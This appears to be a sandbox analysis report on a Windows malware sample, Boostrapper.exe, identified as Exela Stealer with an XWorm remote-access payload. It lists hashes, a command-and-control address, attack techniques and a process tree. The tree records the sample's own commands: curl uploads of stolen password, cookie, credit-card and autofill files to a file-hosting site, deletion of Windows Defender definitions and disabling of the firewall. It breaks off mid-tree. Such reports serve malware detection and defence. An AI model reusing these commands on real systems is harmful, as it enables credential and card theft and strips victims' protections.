exelastealer | d0cd7981277abd23bab4713e11bcd3326f1145e6430e6f3f3743fd46fb0d6fdc

Analysis

max time kernel
4s
max time network
49s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
28-09-2024 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Boostrapper.exe
Size

171.7MB
MD5

83d45fa3a1978c59d3184e359cf569ee
SHA1

5cf9fca2a59ed7a4685f0666e797a493558a6db6
SHA256

d0cd7981277abd23bab4713e11bcd3326f1145e6430e6f3f3743fd46fb0d6fdc
SHA512

6cff0d1ecc1ffae6e4fbb593244b5a37c02392c74adbb7a4e99b18f849836290ed177b269b1d92f980096cdf8f47ac074ba46c9ffeb86ea9544e3d88db2cca55
SSDEEP

3145728:i7idzgrcidjyHGAYJk2RsaHaHPSyAPgdg3ib33ohJH69WfKNZLZM+tpt5zR:GBovHUkJaUPSyANib33ovaNZLl5

Score

10^/10

exelastealer xworm collection defense_evasion discovery evasion execution pyinstaller rat stealer trojan upx

Malware Config

Extracted

Family

xworm

22.ip.gl.ply.gg:55064

Attributes

Install_directory
%AppData%
install_file
Cloner.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002ab06-126.dat	family_xworm
behavioral1/memory/1872-157-0x0000000000490000-0x00000000004A6000-memory.dmp	family_xworm

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
12684	netsh.exe

Clipboard Data 1 TTPs 8 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
908	powershell.exe
10224	powershell.exe
11528	powershell.exe
11508	powershell.exe
9308	powershell.exe
16368	powershell.exe
14964	powershell.exe
4388	cmd.exe

Executes dropped EXE 7 IoCs

pid	Process
2524	REAPERSTEALER.EXE
4600	STARTUP.EXE
1872	SYS32.EXE
3016	SYSTEM.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
1052	STARTUP.EXE

Loads dropped DLL 64 IoCs

pid	Process
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
1052	STARTUP.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
1052	STARTUP.EXE
2256	REAPERSTEALER.EXE
1052	STARTUP.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
3488	SYSTEM.EXE
1052	STARTUP.EXE
1052	STARTUP.EXE
3488	SYSTEM.EXE
1052	STARTUP.EXE
2256	REAPERSTEALER.EXE
2256	REAPERSTEALER.EXE
1052	STARTUP.EXE
2256	REAPERSTEALER.EXE
3488	SYSTEM.EXE
1052	STARTUP.EXE
1052	STARTUP.EXE
2256	REAPERSTEALER.EXE
1052	STARTUP.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
12580	powershell.exe
12988	powershell.exe
12648	powershell.exe
15356	powershell.exe
4932	powershell.exe
7688	powershell.exe
10908	powershell.exe
10736	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com
27	discord.com
31	discord.com
11	discord.com
13	discord.com
14	discord.com
28	discord.com
30	discord.com

Looks up external IP address via web service 23 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	checkip.amazonaws.com
17	checkip.amazonaws.com
35	checkip.amazonaws.com
68	checkip.amazonaws.com
10	ip-api.com
29	checkip.amazonaws.com
32	checkip.amazonaws.com
43	checkip.amazonaws.com
44	checkip.amazonaws.com
45	checkip.amazonaws.com
46	checkip.amazonaws.com
70	checkip.amazonaws.com
1	api.ipify.org
72	checkip.amazonaws.com
71	checkip.amazonaws.com
26	checkip.amazonaws.com
33	checkip.amazonaws.com
52	checkip.amazonaws.com
65	checkip.amazonaws.com
7	api.ipify.org
67	checkip.amazonaws.com
69	checkip.amazonaws.com
22	checkip.amazonaws.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
6000	cmd.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1908	tasklist.exe
1932	tasklist.exe
2808	tasklist.exe
976	tasklist.exe
3840	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2360	cmd.exe

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3488-396-0x00007FF80BC20000-0x00007FF80C085000-memory.dmp	upx
behavioral1/memory/3488-413-0x00007FF8245B0000-0x00007FF8245BF000-memory.dmp	upx
behavioral1/memory/3488-412-0x00007FF824270000-0x00007FF824294000-memory.dmp	upx
behavioral1/memory/3488-429-0x00007FF820B40000-0x00007FF820B6C000-memory.dmp	upx
behavioral1/memory/3488-428-0x00007FF820B70000-0x00007FF820B89000-memory.dmp	upx
behavioral1/memory/3488-468-0x00007FF820890000-0x00007FF8208AE000-memory.dmp	upx
behavioral1/memory/3488-467-0x00007FF818CE0000-0x00007FF818E4D000-memory.dmp	upx
behavioral1/memory/3488-476-0x00007FF81BB20000-0x00007FF81BBD6000-memory.dmp	upx
behavioral1/memory/3488-470-0x00007FF80B8A0000-0x00007FF80BC14000-memory.dmp	upx
behavioral1/memory/3488-469-0x00007FF81FCE0000-0x00007FF81FD0E000-memory.dmp	upx
behavioral1/memory/3488-498-0x00007FF80BC20000-0x00007FF80C085000-memory.dmp	upx
behavioral1/memory/3488-503-0x00007FF824270000-0x00007FF824294000-memory.dmp	upx
behavioral1/memory/3488-502-0x00007FF819DC0000-0x00007FF819DE2000-memory.dmp	upx
behavioral1/memory/3488-501-0x00007FF80B780000-0x00007FF80B898000-memory.dmp	upx
behavioral1/memory/3488-511-0x00007FF818CE0000-0x00007FF818E4D000-memory.dmp	upx
behavioral1/memory/3488-510-0x00007FF820C30000-0x00007FF820C49000-memory.dmp	upx
behavioral1/memory/3488-521-0x00007FF80A140000-0x00007FF80A176000-memory.dmp	upx
behavioral1/memory/3488-520-0x00007FF80A5C0000-0x00007FF80AD61000-memory.dmp	upx
behavioral1/memory/3488-509-0x00007FF815170000-0x00007FF81518E000-memory.dmp	upx
behavioral1/memory/3488-508-0x00007FF81FCA0000-0x00007FF81FCAA000-memory.dmp	upx
behavioral1/memory/3488-507-0x00007FF816120000-0x00007FF816131000-memory.dmp	upx
behavioral1/memory/3488-506-0x00007FF80AE90000-0x00007FF80AEDD000-memory.dmp	upx
behavioral1/memory/3488-505-0x00007FF816140000-0x00007FF816159000-memory.dmp	upx
behavioral1/memory/3488-504-0x00007FF816160000-0x00007FF816177000-memory.dmp	upx
behavioral1/memory/3488-494-0x00007FF81CD50000-0x00007FF81CD65000-memory.dmp	upx
behavioral1/memory/3488-493-0x00007FF81F400000-0x00007FF81F414000-memory.dmp	upx
behavioral1/memory/3488-492-0x00007FF81FCB0000-0x00007FF81FCC0000-memory.dmp	upx
behavioral1/memory/3488-491-0x00007FF81FCC0000-0x00007FF81FCD4000-memory.dmp	upx
behavioral1/memory/3488-427-0x00007FF820C20000-0x00007FF820C2D000-memory.dmp	upx
behavioral1/memory/3488-426-0x00007FF820C30000-0x00007FF820C49000-memory.dmp	upx
behavioral1/memory/3488-527-0x00007FF80B8A0000-0x00007FF80BC14000-memory.dmp	upx
behavioral1/memory/3488-526-0x00007FF820890000-0x00007FF8208AE000-memory.dmp	upx
behavioral1/memory/3488-539-0x00007FF81FCE0000-0x00007FF81FD0E000-memory.dmp	upx
behavioral1/memory/3488-619-0x00007FF81BB20000-0x00007FF81BBD6000-memory.dmp	upx
behavioral1/memory/3488-639-0x00007FF824090000-0x00007FF82409D000-memory.dmp	upx
behavioral1/memory/3488-638-0x00007FF81FCB0000-0x00007FF81FCC0000-memory.dmp	upx
behavioral1/memory/3488-637-0x00007FF81FCC0000-0x00007FF81FCD4000-memory.dmp	upx
behavioral1/memory/3488-760-0x00007FF819DC0000-0x00007FF819DE2000-memory.dmp	upx
behavioral1/memory/3488-898-0x00007FF824270000-0x00007FF824294000-memory.dmp	upx
behavioral1/memory/3488-938-0x00007FF80AE90000-0x00007FF80AEDD000-memory.dmp	upx
behavioral1/memory/3488-935-0x00007FF824090000-0x00007FF82409D000-memory.dmp	upx
behavioral1/memory/3488-905-0x00007FF818CE0000-0x00007FF818E4D000-memory.dmp	upx
behavioral1/memory/3488-904-0x00007FF820890000-0x00007FF8208AE000-memory.dmp	upx
behavioral1/memory/3488-897-0x00007FF80BC20000-0x00007FF80C085000-memory.dmp	upx
behavioral1/memory/3488-937-0x00007FF816140000-0x00007FF816159000-memory.dmp	upx
behavioral1/memory/3488-933-0x00007FF80A5C0000-0x00007FF80AD61000-memory.dmp	upx
behavioral1/memory/3488-936-0x00007FF816160000-0x00007FF816177000-memory.dmp	upx
behavioral1/memory/3488-921-0x00007FF81FCC0000-0x00007FF81FCD4000-memory.dmp	upx
behavioral1/memory/3488-1691-0x00007FF81FCC0000-0x00007FF81FCD4000-memory.dmp	upx
behavioral1/memory/3488-1679-0x00007FF80BC20000-0x00007FF80C085000-memory.dmp	upx
behavioral1/memory/3488-2146-0x00007FF80BC20000-0x00007FF80C085000-memory.dmp	upx

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000400000002aa15-4.dat	pyinstaller
behavioral1/files/0x000300000002aa7e-53.dat	pyinstaller
behavioral1/files/0x000100000002ab07-165.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Boostrapper.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3148	cmd.exe
5632	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1972	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5744	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
7612	taskkill.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2868	schtasks.exe
228	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	SYS32.EXE

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4988 wrote to memory of 2524	4988	Boostrapper.exe	77
PID 4988 wrote to memory of 2524	4988	Boostrapper.exe	77
PID 4988 wrote to memory of 4600	4988	Boostrapper.exe	78
PID 4988 wrote to memory of 4600	4988	Boostrapper.exe	78
PID 4988 wrote to memory of 1872	4988	Boostrapper.exe	281
PID 4988 wrote to memory of 1872	4988	Boostrapper.exe	281
PID 4988 wrote to memory of 3016	4988	Boostrapper.exe	81
PID 4988 wrote to memory of 3016	4988	Boostrapper.exe	81
PID 2524 wrote to memory of 2256	2524	REAPERSTEALER.EXE	82
PID 2524 wrote to memory of 2256	2524	REAPERSTEALER.EXE	82
PID 3016 wrote to memory of 3488	3016	SYSTEM.EXE	83
PID 3016 wrote to memory of 3488	3016	SYSTEM.EXE	83
PID 2256 wrote to memory of 3420	2256	REAPERSTEALER.EXE	84
PID 2256 wrote to memory of 3420	2256	REAPERSTEALER.EXE	84
PID 4600 wrote to memory of 1052	4600	STARTUP.EXE	86
PID 4600 wrote to memory of 1052	4600	STARTUP.EXE	86
PID 3488 wrote to memory of 3816	3488	SYSTEM.EXE	163
PID 3488 wrote to memory of 3816	3488	SYSTEM.EXE	163

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3412	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Boostrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Boostrapper.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Users\Admin\AppData\Local\Temp\REAPERSTEALER.EXE
  "C:\Users\Admin\AppData\Local\Temp\REAPERSTEALER.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Users\Admin\AppData\Local\Temp\REAPERSTEALER.EXE
    "C:\Users\Admin\AppData\Local\Temp\REAPERSTEALER.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:3420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4676
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:5404
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3776
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:7524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:10916
- C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
  "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
    "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:72
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
      4⤵
      PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        5⤵
        
        PID:4468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:668
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:3732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:3620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:3044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:2464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:5052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:5808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:5348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:3176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:5084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        19⤵
        
        PID:8796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        18⤵
        
        PID:9716
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        19⤵
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:6736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:7160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:7184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:8220
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        19⤵
        
        PID:12032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        18⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        19⤵
        
        PID:14892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:15592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:9884
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:3512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:10700
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:16360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        16⤵
        
        PID:13112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        16⤵
        
        PID:13288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        16⤵
        
        PID:15208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:5760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:4936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:7340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:7272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:9136
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        19⤵
        
        PID:14212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        18⤵
        
        PID:10376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:11864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:8508
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:11972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:10812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        16⤵
        
        PID:16192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        16⤵
        
        PID:12384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:10180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:10776
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:13044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:12028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:12164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:7884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:10784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        14⤵
        
        PID:12060
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        15⤵
        
        PID:14272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        14⤵
        
        PID:15156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:3768
        
        C:\Windows\system32\cmd.exe
        
